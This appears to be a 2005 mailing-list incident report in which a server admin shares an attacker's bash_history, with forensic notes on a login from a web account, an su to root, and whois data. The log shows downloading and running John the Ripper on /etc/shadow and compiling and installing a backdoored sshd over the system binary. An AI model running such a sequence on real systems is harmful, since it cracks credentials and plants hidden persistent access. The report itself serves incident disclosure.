Subject: SSH compiled with backdoor


One of my web servers was hacked on July 17, 2005. bash_history

wget;tar zxvf
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow
wget;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart

According to john, a couple of users had weak passwords, but root
seemed well protected. From looking in all the bash_history, it appears the
hacker came in from the website account, and did an su from there.

I found this about a month later when I logged into the box, did an ls,
only to be met by a seg fault. A ps x showed mech.tgz trying to be
downloaded, and a bunch of other CRON processes running. The auth log
didn't show other logins, though, so the ssh installed must have logging
turned off for the backdoor they installed.

I filled out an abuse form at geocities for the accounts hosting the
software after downloading the software (I couldn't find the tgz files on
my system).

Last showed:
reboot system boot 2.4.18-bf2.4 Sun Jul 17 18:15
website pts/0 Sun Jul 17 17:42 - down
website pts/1 Sun Jul 17 17:05 - 17:26
website pts/0 Sun Jul 17 16:26 - 17:41

whois says:
inetnum: -
netname: DATANET-RO
descr: Starnets - Datanet
country: RO
address: DATA NET
address: Str. Ioan N. Roman Nr. 13
address: Constanta, cod 900199, ROMANIA

Best Regards,